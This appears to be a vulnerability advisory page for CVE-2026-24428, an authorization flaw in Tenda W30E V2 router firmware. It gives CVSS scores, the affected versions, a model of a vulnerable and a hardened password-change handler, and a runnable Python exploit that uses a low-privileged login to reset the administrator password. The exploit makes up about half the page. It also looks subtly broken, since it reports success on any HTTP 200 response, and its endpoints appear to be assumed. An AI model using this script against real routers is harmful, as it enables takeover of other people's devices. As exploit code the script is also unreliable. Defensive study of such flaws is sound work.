Security Vulnerability Report
CVE-2026-24428 CVSS 8.8 HIGH

CVE-2026-24428

Published: 2026-01-26 18:16:40
Last Modified: 2026-01-29 13:02:05

Description

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain an authorization flaw in the user management API that allows a low-privileged authenticated user to change the administrator account password. By sending a crafted request directly to the backend endpoint, an attacker can bypass role-based restrictions enforced by the web interface and obtain full administrative privileges.
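As an added illustration (not Tenda's firmware code and not part of this advisory), a minimal model of the password-change handler with and without the server-side authorization check the description says is missing: the vulnerable version decides who may be changed from request fields alone, the hardened one decides from the server-side session and re-verifies the current password. The user store, handler names and hash helper are constructed assumptions; the field names follow the page's PoC.

```python
import hashlib
import hmac

# Constructed toy hash for the model only (a real device would use a proper KDF).
def _h(p: str) -> str:
    return hashlib.sha256(p.encode()).hexdigest()

# Constructed user store: username -> server-side role and password hash.
USERS = {
    "admin": {"group": "admin", "pw": _h("admin-secret")},
    "guest": {"group": "user", "pw": _h("guest-pass")},
}


def change_password_vulnerable(session_user, req):
    """Models CWE-863 as described: the target account and 'group' come from
    the request, and cur_password is never checked, so any authenticated
    user can reset 'admin'."""
    target = req["username"]
    if target not in USERS:
        return 403, "no such user"
    USERS[target]["pw"] = _h(req["password"])
    return 200, "success"


def change_password_hardened(session_user, req):
    """Authorization is decided from the server-side session, never from
    client-supplied fields, and the caller must re-authenticate."""
    target = req["username"]
    if target not in USERS:
        return 403, "denied"
    actor_role = USERS[session_user]["group"]
    # Only an admin may change another account; everyone else only their own.
    if target != session_user and actor_role != "admin":
        return 403, "denied"
    # Re-verify the caller's current password (constant-time compare).
    supplied = _h(req.get("cur_password", ""))
    if not hmac.compare_digest(USERS[session_user]["pw"], supplied):
        return 403, "denied"
    # A client-supplied "group" field is ignored; roles live only server-side.
    USERS[target]["pw"] = _h(req["password"])
    return 200, "success"
```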

CVSS Details

CVSS 3.1 Score (Primary)
8.8
Severity
HIGH
CVSS 3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 Score (Secondary)
8.7 HIGH
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:* (version end including 16.01.0.19(5037)) - VULNERABLE
cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform; the flaw is in the firmware)
Tenda W30E V2 firmware V16.01.0.19(5037) and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-24428 PoC - Tenda W30E V2 Authorization Bypass
# Target: Tenda W30E V2 router with firmware <= V16.01.0.19(5037)

TARGET_IP = "192.168.0.1"
LOGIN_URL = f"http://{TARGET_IP}/login.cgi"
PASSWORD_CHANGE_URL = f"http://{TARGET_IP}/cgi-bin/user_mng.cgi"


def exploit_cve_2026_24428(target_ip, low_priv_user, low_priv_pass,
                           target_user="admin", new_password="Pwned123456"):
    """
    Exploit for CVE-2026-24428: Tenda W30E V2 incorrect authorization
    Allows low-privileged authenticated user to change admin password
    """
    # Build the endpoint URLs from the target_ip argument (the original
    # ignored the argument and always used the module-level TARGET_IP).
    login_url = f"http://{target_ip}/login.cgi"
    password_change_url = f"http://{target_ip}/cgi-bin/user_mng.cgi"
    session = requests.Session()

    # Step 1: Authenticate with low-privilege account
    login_data = {
        "username": low_priv_user,
        "password": low_priv_pass
    }
    login_response = session.post(login_url, data=login_data)
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False
    print("[+] Successfully authenticated with low-privilege account")

    # Step 2: Bypass authorization and change admin password
    # This direct API call bypasses web interface RBAC checks
    exploit_data = {
        "username": target_user,
        "password": new_password,
        "cur_password": "",  # Not validated server-side
        "group": "admin"
    }
    exploit_response = session.post(password_change_url, data=exploit_data)
    if "success" in exploit_response.text.lower() or exploit_response.status_code == 200:
        print(f"[+] Successfully changed {target_user} password to: {new_password}")
        print("[+] Full administrative access obtained!")
        return True
    else:
        print(f"[-] Exploit failed. Response: {exploit_response.text}")
        return False


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 4:
        print("Usage: python cve_2026_24428.py <target_ip> <low_priv_user> <low_priv_pass>")
        sys.exit(1)
    exploit_cve_2026_24428(sys.argv[1], sys.argv[2], sys.argv[3])
```

References

https://www.tendacn.com/product/W30E (Product)
https://www.vulncheck.com/advisories/tenda-w30e-v2-incorrect-authorization-allows-administrator-password-change (Third Party Advisory)
